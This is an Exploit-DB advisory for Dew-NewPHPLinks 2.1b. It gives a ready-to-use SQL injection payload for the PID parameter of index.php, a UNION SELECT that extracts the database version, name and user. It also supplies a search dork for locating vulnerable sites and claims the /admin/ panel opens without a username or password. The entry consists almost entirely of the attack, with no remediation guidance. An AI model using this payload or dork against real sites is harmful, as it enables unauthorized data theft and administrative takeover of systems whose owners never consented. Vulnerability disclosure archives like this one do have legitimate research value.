Dew-NewPHPLinks 2.1b index.php - SQL Injection Vulnerability

2011-02-06T00:00:00
ID EDB-ID:16122
Type exploitdb
Reporter AtT4CKxT3rR0r1ST
Modified 2011-02-06T00:00:00

Description

Dew-NewPHPLinks 2.1b (index.php) - SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Dew-NewPHPLinks v.2.1b (index.php) Sql Injection Vulnerability
======================================================================

######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.dew-code.com/
.:. Dork           : "Powered By Dew-NewPHPLinks v.2.1b" 
.:. Special Gr34T$ T0 ZaIdOoHxHaCkEr

######################################################################

===[ Exploit ]===
First:
=======
www.site.com/index.php?PID=9999[Sql Injection]

www.site.com/index.php?PID=9999+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user()),2

Second:
=======
Bypass join Control Admin 
Go to Control Admin [www.site.com/admin/] Dont Ask Username & Password

######################################################################

txt